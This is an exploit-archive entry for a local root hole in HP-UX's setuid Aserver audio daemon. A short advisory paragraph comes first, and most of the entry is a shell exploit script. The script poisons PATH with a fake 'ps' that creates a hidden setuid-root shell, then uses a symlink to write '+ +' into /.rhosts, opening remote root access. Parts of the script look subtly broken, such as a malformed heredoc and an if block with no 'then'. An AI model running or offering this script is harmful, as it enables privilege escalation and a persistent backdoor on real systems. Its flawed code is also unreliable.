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# source: https://www.securityfocus.com/bid/1929/info
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# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
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# During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
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# This is a trivial root compromise.
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#
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#!/bin/sh
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#
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# HP-UX aserver.sh - Loneguard 18/10/98
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# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
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#
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cd /var/tmp
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cat < _EOF > ps
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#!/bin/sh
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cp /bin/csh /var/tmp/.foosh
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chmod 4755 /var/tmp/.foosh
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_EOF
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chmod 755 ps
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PATH=.:$PATH
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/opt/audio/bin/Aserver -f
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if [ -e /var/tmp/.foosh ]
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# Hmmm, you not like that technique?
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cd /tmp
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rm last_uuid
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ln -s /.rhosts last_uuid
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/opt/audio/bin/Aserver -f
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echo "+ +" > /.rhosts
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# Haha, my Kungfu is the best!
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fi
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echo Crazy MONKEY! |